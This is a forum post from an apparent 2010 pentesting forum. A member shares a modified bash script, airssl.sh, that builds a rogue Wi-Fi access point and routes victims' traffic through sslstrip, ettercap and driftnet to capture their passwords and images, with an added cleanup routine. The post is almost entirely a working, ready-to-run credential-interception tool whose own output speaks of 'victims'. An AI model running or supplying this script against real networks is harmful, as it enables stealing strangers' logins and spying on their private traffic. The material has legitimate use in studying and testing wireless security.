Results 1 to 10 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

Threaded View

  1. #18
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I still dont have DHCP working but I did hack this script up a bit as well.. hope you like my modifications

    the biggest thing I wanted to add was a --cleanup process so that it no longer messed things up for me while trying to troubleshoot the DHCP issue. I assume my problem is something with my wireless drivers and injection even if it works else where.. dont know yet.

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - SpudGunMan 2010
    # airssl.sh - v1.2
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    ## set the subnet for DHCP handed out to the FAKEAP Wireless CLients
    fakeAPnet=10.0.0.0 #network for dhcp
    fakeAPSubnetMask=255.255.255.0 #subnet for dhcp
    fakeAPat0Address=10.0.0.1 #the interface address and gateway for the fakeAP dhcp
    fakeAPdns=8.8.8.8 #a valid DNS server
    fakeAPrange="10.0.0.20 10.0.0.50" #string for the range
    
    CleanUp ()
    {
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Check if clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    rm -f airssl-cleanup
    exit
    }
    
    initalize(){
    # Network questions
    echo
    echo "===========Internet Connection Information========="
    route -n -A inet | grep UG
    echo "====Airmon Check Output (Should be no errors)======"
    airmon-ng check
    echo "====Airmon Output (FakeAP Wireless Interface)======"
    airmon-ng
    echo
    echo
    read -r -p "Enter Default gateway IP address, this is listed above. example 192.168.1.254: " gatewayip
    read -r -p "Enter interface connected to the internet, this is listed above. example wlan0: " internet_interface
    read -r -p "Enter your interface to be used for the fake AP, for example wlan1: " fakeap_interface
    fakeap=$fakeap_interface
    read -r -p "Enter the ESSID you would like your rogue AP to be called: " ESSID
    airmon-ng start $fakeap_interface
    read -r -p "Enter interface for fake AP, after airmon-ng processing example mon0: " fakeap_interface
    }
    # Clean up command line
    if [ "$1" = "--cleanup" ] ; then
    echo "[+] Previous Job Settings will be used"
    . airssl-cleanup
    CleanUp
    elif [ "$1" != "" ]; then
    echo
    echo "Fake AP with SSL Strip"
    echo "to cleanup last job run airssl.sh --cleanup"
    exit
    else
    echo "Fake AP - SSL Strip"
    fi
    initalize
    echo
    echo "Default/Networks Gateway: "$gatewayip
    echo "Default/Networks Gateway Interface: "$internet_interface
    echo "FakeAP ESSID: "$ESSID
    echo "FakeAP Fake Interface: "$fakeap_interface
    echo
    echo 
    read -r -n 1 -p "Is this information correct? (y/n)" ANSWER
    if [ $ANSWER = "y" ] ; then
    echo "[+] Settings will be used"
    else
    echo "[+] airmon cleanup"
    airmon-ng stop $fakeap_interface
    initalize
    fi
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet $fakeAPnet netmask $fakeAPSubnetMask {
    option routers $fakeAPat0Address;
    option subnet-mask $fakeAPSubnetMask;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers $fakeAPdns;
    
    range $fakeAPrange;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    read -r -n 1 -p "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... y or n or (a)All?" ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring interface and clear tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 $fakeAPat0Address netmask $fakeAPSubnetMask
    ifconfig at0 mtu 1400
    route add -net $fakeAPnet netmask $fakeAPSubnetMask gw $fakeAPat0Address
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 10
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Configuring sslstrip..."
    read -r -n 1 -p "Would you like to Start SSLstrip?, y or n " STRIP
    echo
    if [ $STRIP = "y" ] ; then
    echo "[+] Configuring iptables for sslstrip..."
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    else
    echo "[+] Configuring iptables without sslstrip..."
    iptables -X
    iptables -F
    iptables -A FORWARD -i at0 -o $internet_interface -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    fi
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    read -r -n 1 -p "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n " ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    read -r -n 1 -p "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n " DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    
    if [ $STRIP = "y" ] ; then
    echo "[+] Starting sslstrip logging..."
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    sleep 2
    fi
    
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo
    echo "After you have finished please close airssl and clean up properly by hitting y"
    echo "if airssl is not cleaned up properly ERRORS WILL OCCUR"
    echo "otherwise you can clean up later with the airssl --cleanup command"
    read -r -n 1 -p "(press y to cleanup now)" WISH
    
    # Clean up
    if [ "$WISH" = "y" ] ; then
    CleanUp
    else
    save=$'\n'
    echo -n "#cleanup process information"$'\n' > airssl-cleanup
    echo -n "fakeapid="$fakeapid$'\n' >> airssl-cleanup
    echo -n "dchpid="$dchpid$'\n' >> airssl-cleanup
    echo -n "sslstripid="$sslstripid$'\n' >> airssl-cleanup
    echo -n "ettercapid="$ettercapid$'\n' >> airssl-cleanup
    echo -n "dritnetid="$dritnetid$'\n' >> airssl-cleanup
    echo -n "sslstriplogid="$sslstriplogid$'\n' >> airssl-cleanup
    echo -n "fakeap_interface="$fakeap_interface$'\n' >> airssl-cleanup
    echo -n "fakeap="$fakeap$'\n' >> airssl-cleanup
    fi
    
    exit
    Last edited by spudgunman; 11-15-2010 at 06:51 PM. Reason: fix typo

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •